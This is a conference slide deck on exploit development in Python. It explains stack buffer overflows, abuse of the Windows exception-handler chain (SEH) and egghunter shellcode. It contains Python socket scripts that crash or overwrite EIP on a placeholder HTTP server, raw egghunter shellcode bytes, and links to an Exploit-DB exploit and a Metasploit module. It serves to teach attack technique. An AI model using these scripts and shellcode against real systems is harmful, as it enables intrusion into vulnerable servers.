exploit development with python

EXPLOIT

DEVELOPMENT

WITH PYTHONTom Gregory

id:python Gathering

27 April 2013

AGENDA

Memory

Stack/Buffer Overflow

Structured Exception Handler (SEH)

Escape from small space

Egghunter

Demo

Args./Environment

Stack

Unused Memory

Heap (dynamic data)

Static Data .data

Program Code .text

PROCESS MEMORY LAYOUT

High addresses

Top of memory

0xFFFFFFFF

Low addresses

0x00000000

Stack grows down by

procedures call

Heap grows up e.g. by

malloc and new

STACK BUFFER OVERFLOW

#include <string.h>

void foo (char *bar)

{

char c[12];

strcpy(c, bar); // no bounds checking...

}

int main (int argc, char **argv)

{

foo(argv[1]);

}


Unallocated stack

char c[12]

char *bar

Saved frame

pointer

(EBP)Return Address

(EIP)

Parent routine’s

stack

Memory addressStack growth


Unallocated stack

char c[12]

char *bar

Saved frame

pointer

(EBP)Return Address

(EIP)

Parent routine’s

stack


h e l l

\0o


Unallocated stack


A A A A

A A A A

A A A A

A A A A

A A A A

A A A A

A A A A

\x08 \x35 \xc0 \x80

Fill the stack with ‘A’

Overwritten return address

at 0x80c03508

Parent routine’s

stack

Little

Endian

0x80c03508

WHAT IS SEH?

This structure ( also called a SEH record) is 8 bytes and has 2 (4

bytes each) elements :

a pointer to the next exception_registration structure (in essence,

to the next SEH record, in case the current handler is unable the

handle the exception)

a pointer, the address of the actual code of the exception handler.

(SE Handler)

WHAT IS SEH?

Image was taken without permission from http://images.google.com

LOOK AT THE SEH STRUCTURE

Beginning of SEH chain

SEH chain will be placed at the top of the main data block

It also called FS:[0] chain as well (on intel: mov [reg], dword ptr

fs:[0])

End of seh chain

Is indicated by 0xFFFFFFFF

Will trigger improper termination to the program

HOW SEH WORKS?Stack

TEB

FS[0]: 0012FF40 0012FF40

0012FF44

0012FFB0 : next SEH record

7C839AD8 : SE Handler

0012FFB0

0012FFB4

0012FFE0 : next SEH record

0040109A : SE Handler

0012FFE0

0012FFE4

FFFFFFFF : next SEH record

7C839AD8 : SE Handler

PROTECTIONS AGAINST SEH

XOR

before the exception handler is called, all registers are XORedwith each other, so it will make them all point to 0x00000000

DEP & Stack Cookies

Stack Cookies or Canary is setup via C++ compiler options

DEP will mark the memory stack to no execute.

It was introduced since Windows XP SP2 and Windows 2003, enabled by default on Windows Vista and 7

Those two protections can make it harder to build exploits.

PROTECTIONS AGAINST SEH

SafeSEH

additional protection was added to compilers, helping to stop the

abuse of SEH overwrites.

It will check the original value of SEH, if it overwritten, SafeSEH

will try to bring it back to the original value.

ABUSING SEH

On direct RET technique:

Simply find an instruction to jump to the stack, done.

While on SEH Based:

You cannot simply jump to the stack, because the registers are XORed.

We can take advantage this exception handling condition by overwrite the SE Handler address.

The OS will know the exception handling routine, and pass it to next SEH record.

Pointer to next SEH will bring us to the shellcode.

Game over!

ABUSING SEH

In other words, the payload must do the following things:

Cause an exception. Without an exception, the SEH handler (the

one you have overwritten/control) won’t kick in.

Overwrite the pointer to the next SEH record with some jumpcode

(so it can jump to the shellcode)

Overwrite the SE handler with a pointer to an instruction that will

bring you back to next SEH and execute the jumpcode.

The shellcode should be directly after the overwritten SE Handler.

Some small jumpcode contained in the overwritten “pointer to

next SEH record” will jump to it).

ABUSING SEH When the exception occurred, the position on the stack will going like

this:

Possible value to overwrite SE Handler are POP something, POP

something and RETN to the stack.

It will POP address that sit at the top of the stack, POP it again to take

the second address, and RETN to execute the third address (which is

now at the top of the stack)

Top of stack

Our pointer to next SEH

address

ABUSING SEH

Image was taken from http://corelan.be

with permission from Peter van Eeckhoutte (Corelan)

ESCAPE FROM SMALL SPACE

Use Egghunter

“Staged shellcode”

Use small amount of custom shellcode to find the actual “bigger”

shellcode (the egg), by searching entire memory for the final

shellcode

EGGHUNTER

There are 3 conditions that are important in order for this

technique to work

We must be able to jump to (jmp, call, push/ret) & execute “some” shellcode,

the egghunter.

The final shellcode must be available somewhere in memory (stack/heap/…).

You must “tag” or prepend the final shellcode with a unique string/marker/tag.

This means that we will have to define the marker in the egg hunter code, and

also write it just in front of the actual shellcode.

ENOUGH TALKING!

1ST SKELETON EXPLOIT: CRASH IT!

#!/usr/bin/python

from socket import *

junk = "\x41" * 10000

s = socket(AF_INET, SOCK_STREAM)

s.connect((‘x.x.x.x’,8000))

print "[+] Launching attack..”

s.send ("GET /" + payload + "HTTP/1.0\r\n\r\n\r\n")

s.close()

2ND SKELETON EXPLOIT: EIP

OVERWRITE

#!/usr/bin/python

from socket import *

junk = [random data generated from msf]

s = socket(AF_INET, SOCK_STREAM)

s.connect((‘x.x.x.x’,8000))

print "[+] Launching attack..”

s.send ("GET /" + payload + "HTTP/1.0\r\n\r\n\r\n")

s.close()

3RD SKELETON EXPLOIT: SMALL

SPACE

Egghunter

\x66\x81\xca\xff\x0f\x42\x52\x6a

\x02\x58\xcd\x2e\x3c\x05\x5a\x74

\xef\xb8\x77\x30\x30\x74\x8b\xfa

\xaf\x75\xea\xaf\x75\xe7\xff\xe7

4TH FINAL EXPLOIT

Exploit DB

http://www.exploit-db.com/exploits/19266/

Metasploit


http://www.metasploit.com/modules/exploit/windows/http/ezserver_http



EOF

[email protected]

exploit development with python

Technology